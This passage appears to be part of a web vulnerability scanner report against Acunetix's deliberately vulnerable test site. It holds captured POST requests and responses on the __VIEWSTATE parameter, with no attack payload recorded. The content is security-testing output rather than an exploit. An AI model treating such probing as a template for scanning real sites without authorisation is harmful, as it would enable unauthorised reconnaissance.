href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8589&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAA40VGf9sIZGRkJ%2FWhloJNo1GumPjkShl6DGs6rbQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKWhfqrCQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCuysXYASib2284y%2BRxq7FGjHGKcR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:28 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAA40VGf9sIZGRkJ/WhloJNo1GumPjkShl6DGs6rbQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKWhfqrCQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCuysXYASib2284y+Rxq7FGjHGKcR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:White" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8577&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAA7kjYddsIZGRkKLiu3RLAOEJLhPgEcja%2FXs2AOuI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLkxcy5BgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCr9e4gMx%2FjZH1iHMoVlUH6PAM7%2FE
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:46 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAA7kjYddsIZGRkKLiu3RLAOEJLhPgEcja/Xs2AOuI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLkxcy5BgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCr9e4gMx/jZH1iHMoVlUH6PAM7/E" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:White" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a 